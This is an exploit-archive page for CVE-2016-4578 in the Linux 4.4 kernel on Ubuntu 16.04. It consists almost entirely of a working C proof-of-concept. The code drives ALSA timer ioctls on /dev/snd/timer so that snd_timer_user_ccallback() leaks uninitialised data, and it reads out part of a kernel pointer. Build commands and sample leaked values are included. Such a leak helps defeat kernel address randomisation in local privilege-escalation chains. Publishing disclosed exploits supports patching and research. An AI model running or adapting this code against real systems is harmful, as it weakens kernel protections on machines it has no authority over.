Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak
2019-03-11 16:05:11#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>
# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()
# Google Dork: -
# Date: 2019-03-11
# Exploit Author: wally0813
# Vendor Homepage: -
# Software Link: -
# Version: Linux Kernel 4.4 (Ubuntu 16.04)
# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# CVE: CVE-2016-4578
# Category: Local
/*
* [ Briefs ]
* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
* - This is local exploit against the CVE-2016-4578.
*
* [ Tested version ]
* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
*
* [ Prerequisites ]
* -
*
* [ Goal ]
* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
*
* [ Run exploit ]
* - $ gcc -o poc poc.c
* - $ sudo ./poc
* leak_value(event) : ffff8800
* leak_value(val) : ffffffff
*
* [ Contact ]
* - [email protected]
*/
int fd;
void leak(){
struct snd_timer_tread td;
struct snd_timer_select st;
struct snd_timer_params ps;
int r;
unsigned int leak_value_e, leak_value_v;
int tread;
memset(&td,0,sizeof(td));
memset(&st,0,sizeof(st));
memset(&ps,0,sizeof(ps));
// set tread
tread = 1;
ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
ps.ticks = 1000 * 1000;
r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
if (r) {
printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
return;
}
// vuln trigger
st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
if (r) {
printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
if (r) {
printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
if (r) {
printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
return;
}
// get leak
r = read(fd, &td, sizeof(td));
leak_value_e = *((unsigned long *)(&td.event+1));
printf("leak_value(event) : %lx\n", leak_value_e);
leak_value_v = *((unsigned long *)(&td.val+1));
printf("leak_value(val) : %lx\n", leak_value_v);
}
int main(int argc, char **argv)
{
fd = open("/dev/snd/timer", O_RDWR);
if (fd < 0) {
printf("open error : %d, %s\n", errno, strerror(errno));
return -1;
}
leak();
close(fd);
return 0;
}
Fixes
No fixesIn order to submit a new fix you need to be registered.